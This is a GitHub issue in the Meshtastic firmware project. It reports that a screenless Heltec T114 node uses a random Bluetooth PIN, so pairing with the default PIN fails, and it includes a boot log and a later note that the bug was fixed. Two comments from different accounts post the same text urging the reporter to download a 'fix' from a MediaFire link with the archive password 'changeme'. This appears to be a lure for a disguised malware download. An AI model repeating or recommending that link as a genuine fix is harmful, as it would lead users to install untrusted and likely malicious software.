meshtastic/firmware #4565: [Bug]: Heltec Mesh Node T114 no screen option - bluetooth PIN random rather than fixed

fifieldt, 2024-08-27:
### Category

BLE

### Hardware

Other

### Firmware Version

2.4.3.91d6612

### Description

**What happened**
1. Install new firmware (2.4.3.91d6612)
2. Open phone to pair to Heltec Mesh Node T114 (no screen option)
3. Enter default PIN (123456)
4. Pairing failed

**What should happen instead**
* Pairing should succeed. Since there is no screen for a user to read the randomised PIN, firmware should default to the fixed pin.

### Relevant log output

```Shell
//\ E S H T /\ S T / C

DEBUG | ??:??:?? 4 Filesystem files:

DEBUG | ??:??:?? 4  config.proto (96 Bytes)

DEBUG | ??:??:?? 4  module.proto (89 Bytes)

DEBUG | ??:??:?? 4  channels.proto (57 Bytes)

DEBUG | ??:??:?? 4  db.proto (312 Bytes)

DEBUG | ??:??:?? 4 Using analog input 4 for battery level

INFO | ??:??:?? 4 Scanning for i2c devices...

DEBUG | ??:??:?? 4 Scanning for I2C devices on port 1

INFO | ??:??:?? 4 No I2C devices found

DEBUG | ??:??:?? 4 acc_info = 0

INFO | ??:??:?? 4 S:B:33,2.4.3.91d6612

DEBUG | ??:??:?? 4 Reset reason: 0x0

DEBUG | ??:??:?? 5 Setting random seed 3714302688

INFO | ??:??:?? 5 Initializing NodeDB

INFO | ??:??:?? 5 Loading /prefs/db.proto

INFO | ??:??:?? 5 Loaded /prefs/db.proto successfully

INFO | ??:??:?? 5 Loaded saved devicestate version 23, with nodecount: 1

INFO | ??:??:?? 5 Loading /prefs/config.proto

INFO | ??:??:?? 5 Loaded /prefs/config.proto successfully

INFO | ??:??:?? 5 Loaded saved config version 23

INFO | ??:??:?? 5 Loading /prefs/module.proto

INFO | ??:??:?? 5 Loaded /prefs/module.proto successfully

INFO | ??:??:?? 5 Loaded saved moduleConfig version 23

INFO | ??:??:?? 5 Loading /prefs/channels.proto

INFO | ??:??:?? 5 Loaded /prefs/channels.proto successfully

INFO | ??:??:?? 5 Loaded saved channelFile version 23

ERROR | ??:??:?? 5 Could not open / read /oem/oem.proto

DEBUG | ??:??:?? 5 cleanupMeshDB purged 0 entries

DEBUG | ??:??:?? 5 Using nodenum 0x59e4f83f

DEBUG | ??:??:?? 5 Expanding short PSK #1

INFO | ??:??:?? 5 Wanted region 0, using UNSET

DEBUG | ??:??:?? 5 Using GPIO42 for button

DEBUG | ??:??:?? 5 Set Timezone to GMT0

INFO | ??:??:?? 5 GPS power state moving from OFF to ACTIVE

DEBUG | ??:??:?? 5 NeighborInfoModule is disabled

DEBUG | ??:??:?? 5 Rescanning for I2C keyboard

DEBUG | ??:??:?? 5 Scanning for I2C devices on port 1

DEBUG | ??:??:?? 5 Scanning address 0x1f

DEBUG | ??:??:?? 5 Scanning address 0x55

DEBUG | ??:??:?? 5 Scanning address 0x5f

INFO | ??:??:?? 5 External Notification Module Disabled

INFO | ??:??:?? 5 Turning on screen

DEBUG | ??:??:?? 5 haveGlyphs=1

DEBUG | ??:??:?? 5 haveGlyphs=1

DEBUG | ??:??:?? 5 Module wants a UI Frame

DEBUG | ??:??:?? 5 Module wants a UI Frame

DEBUG | ??:??:?? 5 SX126xInterface(cs=24, irq=20, rst=25, busy=17)

DEBUG | ??:??:?? 5 SX126X_DIO3_TCXO_VOLTAGE defined, using DIO3 as TCXO reference voltage at 1.800000 V

INFO | ??:??:?? 5 Starting meshradio init...

DEBUG | ??:??:?? 5 (bw=250, sf=11, cr=4/5) packet symLen=8 ms, payloadSize=0, time 231 ms

DEBUG | ??:??:?? 5 (bw=250, sf=11, cr=4/5) packet symLen=8 ms, payloadSize=253, time 2115 ms

INFO | ??:??:?? 5 Radio freq=906.875, config.lora.frequency_offset=0.000

INFO | ??:??:?? 5 Set radio: region=UNSET, name=LongFast, config=0, ch=19, power=30

INFO | ??:??:?? 5 Radio myRegion->freqStart -> myRegion->freqEnd: 902.000000 -> 928.000000 (26.000000 MHz)

INFO | ??:??:?? 5 Radio myRegion->numChannels: 104 x 250.000kHz

INFO | ??:??:?? 5 Radio channel_num: 20

INFO | ??:??:?? 5 Radio frequency: 906.875000

INFO | ??:??:?? 5 Slot time: 42 msec

INFO | ??:??:?? 5 Set radio: final power level=22

INFO | ??:??:?? 5 SX126x init result 0

INFO | ??:??:?? 5 Frequency set to 906.875000

INFO | ??:??:?? 5 Bandwidth set to 250.000000

INFO | ??:??:?? 5 Power output set to 22

DEBUG | ??:??:?? 5 Current limit set to 140.000000

DEBUG | ??:??:?? 5 Current limit set result 0

DEBUG | ??:??:?? 5 Setting DIO2 as RF switch

DEBUG | ??:??:?? 5 SX126X_RXEN not defined, defaulting to RADIOLIB_NC

DEBUG | ??:??:?? 5 SX126X_TXEN not defined, defaulting to RADIOLIB_NC

DEBUG | ??:??:?? 5 Using MCU pin -1 as RXEN and pin -1 as TXEN to control RF switching

INFO | ??:??:?? 5 Set RX gain to boosted mode; result: 0

INFO | ??:??:?? 5 SX1262 Radio init succeeded, using SX1262 radio

DEBUG | ??:??:?? 5 (bw=250, sf=11, cr=4/5) packet symLen=8 ms, payloadSize=237, time 2000 ms

DEBUG | ??:??:?? 5 LoRA bitrate = 118.500000 bytes / sec

INFO | ??:??:?? 5 PowerFSM init, USB power=1

DEBUG | ??:??:?? 5 Enter state: BOOT

DEBUG | ??:??:?? 5 [Power] Battery: usbPower=1, isCharging=1, batMv=4242, batPct=100

DEBUG | ??:??:?? 5 [Screen] Screen: Started...

DEBUG | ??:??:?? 5 [Screen] haveGlyphs=1

DEBUG | ??:??:?? 5 [GPS] Probing for GPS at 9600

WARN | ??:??:?? 11 [GPS] Failed to find UBlox & MTK GNSS Module using baudrate 9600

INFO | ??:??:?? 11 [RangeTestModule] Range Test Module - Disabled

DEBUG | ??:??:?? 11 [PowerFSM] Initializing NRF52 Bluetooth

INFO | ??:??:?? 11 [PowerFSM] Initialize the Bluefruit nRF52 module

INFO | ??:??:?? 12 [PowerFSM] Bluetooth pin set to '764183'

INFO | ??:??:?? 12 [PowerFSM] Configuring the Device Information Service

INFO | ??:??:?? 12 [PowerFSM] Configuring the Battery Service

INFO | ??:??:?? 12 [PowerFSM] Configuring the Mesh bluetooth service

INFO | ??:??:?? 12 [PowerFSM] Setting up the advertising payload(s)

INFO | ??:??:?? 12 [PowerFSM] Advertising

INFO | ??:??:?? 12 [Screen] Done with boot screen...
```

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

fifieldt, 2024-12-15:
Fixed by https://github.com/meshtastic/firmware/pull/5533

closed 2024-12-15 by fifieldt